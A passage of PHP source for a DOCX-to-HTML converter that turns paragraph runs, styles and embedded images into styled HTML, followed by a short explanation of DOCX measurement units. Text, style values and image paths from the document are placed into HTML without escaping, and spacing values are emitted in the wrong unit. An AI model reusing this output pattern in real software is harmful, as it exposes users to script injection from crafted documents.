$bval = $prchildnode->attributes->getNamedItem('before')->nodeValue;
if (strcmp($bval, '') == 0)
$bval = 0;
$pitem->innerstyle .= "padding-top:" . $bval . "px;";
$aval = $prchildnode->attributes->getNamedItem('after')->nodeValue;
if (strcmp($aval, '') == 0)
$aval = 0;
$pitem->innerstyle .= "padding-bottom:" . $aval . "px;";
array_push($pdef->data, $pitem);
}
}
}
if (strcmp($pchildnode->nodeName, "w:r") == 0)
{
foreach($pchildnode->childNodes as $rchildnode)
{
//process text
if (strcmp($rchildnode->nodeName, "w:t") == 0)
{
$pdef->text .= $rchildnode->nodeValue;
if (count($pdef->data) == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = '';
array_push($pdef->data, $pitem);
}
}
if (strcmp($rchildnode->nodeName, "w:rPr") == 0)
{
foreach($rchildnode->childNodes as $rPrchildnode)
{
if (strcmp($rPrchildnode->nodeName, "w:b") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textBold';
$pitem->value = '';
$pitem->innerstyle .= "font-weight: bold;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:i") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textItalic';
$pitem->value = '';
$pitem->innerstyle .= "font-style: italic;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:u") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textUnderline';
$pitem->value = '';
$pitem->innerstyle .= "text-decoration: underline;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:sz") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textSize';
$sz = $rPrchildnode->attributes->getNamedItem('val')->nodeValue;
if ($sz == '')
{
$sz=0;
}
$pitem->value = $sz;
array_push($pdef->data, $pitem);
}
}
}
}
}
}
array_push($this->paragraphs, $pdef);
}
}
}
}
}
public function to_html()
{
$html = '';
foreach($this->paragraphs as $para)
{
$styleselect = null;
$type = 'text';
$content = $para->text;
$sz = 0;
$extent = '';
$embedid = '';
$pinnerstylesid = '';
$pinnerstylesunderline = '';
$pinnerstylessz = '';
if (count($para->data) > 0)
{
foreach($para->data as $node)
{
if (strcmp($node->name, "styleId") == 0)
{
$type = $node->type;
$pinnerstylesid = $node->innerstyle;
foreach($this->styles as $style)
{
if (strcmp ($node->value, $style->styleId) == 0)
{
$styleselect = $style;
}
}
}
if (strcmp($node->name, "align") == 0)
{
$pinnerstylesid .= $node->innerstyle. ";";
}
if (strcmp($node->name, "drawing") == 0)
{
$type = $node->type;
$extent = $node->innerstyle;
$embedid = $node->value;
}
if (strcmp($node->name, "textSize") == 0)
{
$sz = $node->value;
}
if (strcmp($node->name, "textUnderline") == 0)
{
$pinnerstylesunderline = $node->innerstyle;
}
}
}
if (strcmp($type, 'text') == 0)
{
//echo "has valid para";
//echo "<br>";
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . ((int)$sz / 2) . 'pt;'; //w:sz is stored in half-points
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= $content;
$span .= "</p>";
//echo $span;
$html .= $span;
}
if (strcmp($type, 'graphic') == 0)
{
$imglnk = '';
foreach($this->rels as $rel)
{
if(strcmp($embedid, '') != 0 && strcmp($rel->Id, $embedid) == 0)
{
foreach($this->imglnks as $imgpathdef)
{
//strpos(...) >= 0 is always true, so compare the file names instead
if (basename($imgpathdef->extractedpath) === basename($rel->Target))
{
$imglnk = $imgpathdef->extractedpath;
//echo "has img link<br>";
//echo $imglnk . "<br>";
}
}
}
}
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . ((int)$sz / 2) . 'pt;'; //w:sz is stored in half-points
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= "<img style='". $extent ."' alt='image coming soon' src ='". $imglnk ."'/>";
$span .= "</p>";
//echo $span;
$html .= $span;
}
}
return $html;
}
public function get_errors() {
return $this->errors;
}
private function getStyles() {
}
}
function getDocX($path)
{
//echo $path;
$doc = new Docx_reader();
$doc->setFile($path);
if(!$doc->get_errors()) {
$doc->processDocument();
$html = $doc->to_html();
echo $html;
}
return "";
}
?>
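The class above divides the drawing extents by 9525 and reads w:sz and w:spacing values directly from the XML. For reference, these are the units involved: drawing extents are in EMU (914400 per inch, so 9525 per pixel at 96 DPI), w:sz is in half-points, and w:spacing before/after are in twentieths of a point. A small sketch of the conversions follows; the helper names are hypothetical and not part of the class.

```php
<?php
// Hypothetical helpers for the units used in a docx file.

// Drawing extents (cx, cy) are in EMU: 914400 per inch, i.e. 9525 per pixel at 96 DPI.
function emuToPx(int $emu): float
{
    return $emu / 9525;
}

// w:sz stores the font size in half-points.
function halfPointsToPt(int $halfPoints): float
{
    return $halfPoints / 2;
}

// w:spacing before/after are stored in twentieths of a point.
function twipsToPt(int $twips): float
{
    return $twips / 20;
}
```

For example, a w:sz value of 24 corresponds to a 12pt font, so emitting it with a px unit would render the text at the wrong size.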
